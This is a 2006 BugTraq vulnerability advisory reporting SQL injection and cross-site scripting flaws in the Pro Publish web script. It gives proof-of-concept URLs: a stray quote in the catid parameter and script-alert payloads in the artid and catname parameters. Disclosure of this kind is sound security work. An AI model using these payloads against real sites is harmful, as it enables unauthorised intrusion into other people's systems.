BugTraq
Pro Publish SQL Injection and XSS Vulnerabilities Jun 02 2006 05:25PM
Soothackers gmail com
---------------------------------------------

Pro Publish SQL Injection and XSS Vulnerabilities

---------------------------------------------

Site:

http://www.deltascripts.com/download/

Bug:

1. SQL Injection :

http://victim/propublish/cat.php?catid='

2. XSS :

1- http://victim/propublish/art.php?artid="><script>alert(/Soot/)</script>

2- http://victim/propublish/cat.php?catname="><script>alert(/Soot/)</script
>

---------------------------------------------

Source :

http://soot.shabgard.org/bugs/propublish.txt

Credit :

Soot

Shabgard Security Team

http://www.shabgard.org

Greetz :

Hregy,Elite,Bl2k,Littlehacker,Sasan_4shir

---------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus